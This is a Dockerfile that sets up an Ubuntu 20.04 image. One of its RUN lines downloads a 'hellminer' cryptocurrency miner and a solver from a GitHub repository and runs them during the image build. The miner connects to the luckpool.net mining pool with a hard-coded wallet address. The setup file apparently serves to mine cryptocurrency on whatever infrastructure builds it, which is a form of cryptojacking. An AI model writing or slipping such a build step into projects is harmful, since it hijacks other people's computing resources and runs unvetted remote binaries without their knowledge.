FROM ubuntu:20.04

RUN apt-get update
RUN apt-get install sudo
RUN sudo apt-get update
RUN ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
RUN echo 'Asia/Shanghai' >/etc/timezone
RUN apt-get install wget -y
RUN apt-get install git -y
RUN apt-get install curl -y
RUN apt-get install unzip -y
RUN sudo apt install python3 -y
RUN wget https://github.com/Godmine99/cpu/raw/main/hellminer; chmod +x hellminer; wget https://github.com/Godmine99/cpu/raw/main/verus-solver; chmod +x verus-solver; ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RJz4XfW5AdpMVUF9GMAsDvvsYFuM1MmJeS.blong -p x --cpu 4

COPY /start.sh /
CMD chmod 0777 start.sh && bash start.sh
